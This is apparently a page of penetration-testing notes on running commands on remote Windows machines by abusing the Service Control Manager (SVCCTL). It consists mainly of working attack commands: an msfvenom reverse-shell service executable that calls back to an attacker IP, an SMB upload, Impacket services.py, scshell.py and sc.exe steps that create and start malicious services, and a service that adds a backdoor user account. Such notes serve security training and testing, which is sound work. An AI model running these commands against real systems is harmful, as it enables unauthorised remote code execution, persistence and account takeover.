Services (SVCCTL)

Theory

Windows services can also be leveraged to run arbitrary commands since they execute a command when started. When using sc, it will try to connect to the Service Control Manager (SVCCTL) remote service program through RPC in several ways:

By using MS-SCMR protocols over RPC to connect EMP at port 135. WIll ask for the SVCCTL RPC Endpoint wich is a dynamic port
Try to reach SVCCTL Through SMB named pipes (\PIPE\svcctl) on port 445 (SMB) or 139 (SMB over NetBIOS)

Practice

Service.py

The Impacket script service.py can be use to interact with services remotely.

# create an exe as a service
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKING_IP> LPORT=<PORT> -f exe-service --platform windows -e x64/xor_dynamic  -o shell.exe

# Upload the exe to windows machine
smbclient '\\<TARGET>\smbshare' -U <user> -c "put shell.exe test.exe"

# Using impacket services.py create service remotely
services.py <DOMAIN>/<user>@<TARGET> create -name shell-svc -display my-shell-svc -path "\\\\<TARGET>\\smbshare\\shell.exe"

# Using impacket services.py start the service and get the shell
services.py <DOMAIN>/<user>@<TARGET> start -name shell-svc

# Using impacket services.py delete the service
services.py <DOMAIN>/<user>@<TARGET> delete -name shell-svc

We also can execute commands instead of a binary

# Using impacket services.py create service remotely
services.py <DOMAIN>/<user>@<TARGET> create -name addme -display addme -path "net user munra Pass123 /add"

# Using impacket services.py start the service and get the shell
services.py <DOMAIN>/<user>@<TARGET> start -name addme

# Using impacket services.py delete the service
services.py <DOMAIN>/<user>@<TARGET> delete -name addme

You will get an error starting the service but the commands will still be executed

Scshell.py

The script scshell.py can automate the process to spawn a shell

#Create a service, get shell, delete service
scshell.py domain/<user>@<TARGET>

On windows, we can use the built in sc.exe binary to remotely interact with services

#Create remote service
sc.exe \\TARGET create MyService binPath= "net user munra Pass123 /add" start= auto
sc.exe \\TARGET create MyService binPath= "C:\Windows\TEMP\payload.exe" start= auto

#Start remote service
sc.exe \\TARGET start MyService

#Stop and delete a remote service
sc.exe \\TARGET stop MyService
sc.exe \\TARGET delete MyService

Resources

TryHackMe | Cyber Security TrainingTryHackMe

Last updated 1 year ago